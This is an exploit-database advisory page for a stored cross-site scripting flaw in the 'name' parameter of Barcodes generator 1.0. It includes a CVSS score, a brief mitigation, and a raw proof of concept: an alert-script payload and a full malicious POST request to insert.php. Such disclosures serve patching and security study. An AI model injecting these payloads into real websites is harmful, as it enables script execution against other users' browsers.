header-logo
Suggest Exploit
vendor:
Barcodes Generator Using PHP MySQL and JsBarcode Library
by:
Nikhil Kumar
8.8
CVSS
HIGH
Stored Cross Site Scripting
79
CWE
Product Name: Barcodes Generator Using PHP MySQL and JsBarcode Library
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:egavilanmedia:barcodes_generator_using_php_mysql_and_jsbarcode_library
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2020

Barcodes generator 1.0 – ‘name’ Stored Cross Site Scripting

Barcodes generator 1.0 is vulnerable to Stored Cross Site Scripting. An attacker can inject malicious JavaScript code into the 'name' parameter of the 'index.php' page. The malicious code is then stored in the database and executed when the page is loaded.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database.
Source

Exploit-DB raw data:

# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
# Date: 10/12/2020
# Exploit Author: Nikhil Kumar 
# Vendor Homepage: http://egavilanmedia.com/
# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
# Version: 1.0
# Tested On: Ubuntu

1. Open the index.php page using following url 

http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php

click on the New Barcode

2. Intercept the request through burp suite

Put a payload on "name=" parameter

Payload :- abc"><script>alert("XSS")</script>

Malicious Request::

POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
Upgrade-Insecure-Requests: 1

name=abc"><script>alert("XSS")</script>

Navigation

Suggest Exploit

Services By CQR